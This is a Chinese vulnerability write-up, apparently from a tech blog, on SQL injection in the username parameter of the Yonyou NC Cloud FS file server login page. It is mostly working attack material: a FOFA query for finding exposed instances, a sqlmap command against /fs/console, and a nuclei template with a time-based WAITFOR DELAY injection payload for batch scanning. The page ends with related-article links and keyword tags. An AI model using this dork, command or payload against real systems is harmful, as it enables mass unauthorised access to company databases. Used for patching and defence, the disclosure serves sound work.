用友NC Cloud FS文件服务器SQL注入

漏洞描述

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤，存在SQL注入。

漏洞影响

用友NC Cloud且存在FS文件服务器配置管理登录页面。

漏洞复现

fofa语法：app="用友-NC-Cloud" && icon_hash="1596996317"
用友NC Cloud登录页面如下：

在应用中存在文件服务器管理登录页面
http://xxx.xxx.xxx.xxx/fs/

拦截文件服务器页面的登录请求数据包，然后直接sqlmap梭哈。
sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username

nuclei批量yaml文件

id: yonyou_NCCloud_FS_sqli

info:
  name: 用友 NCCloud FS文件管理SQL注入
  author: mczilong
  severity: critical
  tags: yonyou 
  description: fofa   "NCCloud"
requests:
  - raw:
      - |
        @timeout: 15s
        GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1
        Host: {{Hostname}}        

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'

本栏目推荐文章
• .Net Core 系列： 集成 Consul 实现 服务注册与健康检查
• C++实现文件内查找字符串
• SQL Server 检测是不是数字型数据的两种方法
• 字节微服务HTTP框架Hertz使用与源码分析｜拥抱开
• IDEA项目名称后面出现中括号，模块Modules的名子和文件夹名称不同，可以右键修改名称也可以在File->Project Structure 修改Modules的Name(快捷键ctrl+Shift+Alt+s)
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• Kubernetes Headless服务
• SQL Join的一些总结
• SQL Server 高性能写入的一些总结
• 网络攻击技术开篇——SQL Injection

服务器 文件 Cloud SQL服务器 文件cloud sql 漏洞u8-cloud文件upload uploadchunk漏洞 文件cloud 服务器sql 文件sql sql文件 postgresql文件sql sqlplus文件sql 命令 服务器sql 06 链接 服务器server sql